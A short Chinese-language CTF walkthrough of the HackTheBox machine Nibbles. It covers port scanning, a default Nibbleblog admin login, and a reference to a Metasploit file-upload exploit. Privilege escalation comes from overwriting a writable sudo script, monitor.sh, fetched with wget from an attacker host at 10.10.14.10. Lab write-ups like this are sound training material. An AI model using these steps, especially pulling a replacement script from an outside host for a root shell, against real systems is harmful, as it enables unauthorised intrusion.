基本信息
 
                端口扫描
22和80:
| 1 | nmap -sC -sV 10.10.10.75 | 
80
80就一个helloworld,注释里面有目录:
 
                是个Nibbleblog:
 
                Nibbleblog
直接默认登录:
| 1 | http://10.10.10.75/nibbleblog/admin.php | 
 
                exploit
直接搜到个任意文件上传,msf有模块一键打:
- Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) - PHP remote Exploit
 https://www.exploit-db.com/exploits/38489
 
                user flag
直接用户目录得到user.txt:
 
                提权信息
Sudo -l 发现monitor.sh:
| 1 | python3 -c 'import pty; pty.spawn("/bin/bash")' | 
 
                Personal.zip自己解压后就有相关文件:
| 1 | unzip personal.zip | 
 
                monitor.sh我们有可写权限,那就直接修改内容即可
monitor.sh
| 1 | #!/bin/sh | 
提权 && root flag
直接修改内容,运行,得到root shell:
| 1 | wget http://10.10.14.10:7777/monitor.sh | 
 
                参考资料
- Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) - PHP remote Exploit
 https://www.exploit-db.com/exploits/38489
- https://www.hackthebox.eu/home/machines/writeup/121
- HackTheBox - Nibbles - YouTube
 https://www.youtube.com/watch?v=s_0GcRGv6Ds&feature=youtu.be&ab_channel=IppSec